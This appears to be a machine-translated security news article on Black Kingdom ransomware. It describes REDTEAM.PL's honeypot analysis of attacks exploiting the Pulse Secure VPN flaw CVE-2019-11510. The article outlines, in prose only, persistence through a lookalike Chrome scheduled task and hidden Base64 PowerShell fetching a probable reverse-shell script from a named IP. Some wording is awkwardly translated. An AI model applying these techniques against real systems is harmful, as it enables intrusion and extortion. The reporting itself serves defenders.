Black Kingdom ransomware operators target companies with unpatched Pulse Secure VPN software, according to security researchers.
The malware was trapped in a honeypot, allowing researchers to analyze and document the tactics used by the threat factors.
They take advantage of CVE-2019-11510, a critical vulnerability that affects older versions of the Pulse Secure VPN that was fixed in April 2019. Companies have delayed updating their software even after the publication of exploits, with the US government and some threatening agents taking advantage of it - some organizations continue to run a vulnerable version of the product.
REDTEAM.PL, a Polish-based cybersecurity company, noted that Black Kingdom operators used the same door provided by Pulse Secure VPN to violate what they thought was a target.
From the researchers' observations, ransomware identified persistence with the fake face of a legally programmed job for Google Chrome, with only one letter making the difference:
According to the analysis of REDTEAM.PL, the planned work executes a string code with Base64 encoding in a hidden window PowerShell to get a script named "reverse.ps1" which is probably used to open a "reverse shell" on the compromised host.
Adam Ziaja from REDTEAM.PL said that script it cannot be recovered from the remote server controlled by the intruder, probably because the server that hosted it was blocked before the payload was delivered.
The IP address where "reverse.ps1" resides is 220.127.116.11, which is managed by Choopa, a subsidiary of Vultr, known for the cheap virtual private servers (VPS) it provides. The servers they are also used by Criminals in cyberspace to house their malicious tools.
Black Kingdom ransomware was first detected in late February by security researcher GrujaRS, who found that it accompanied the extension .DEMON to encrypted files.
The sample analyzed was communicated to the same IP address found in its report REDTEAM.PL. The following ransom note appeared asking for $ 10.000 to be deposited in a bitcoin wallet and threatening that if he did not do so it would lead to the destruction or sale of the data.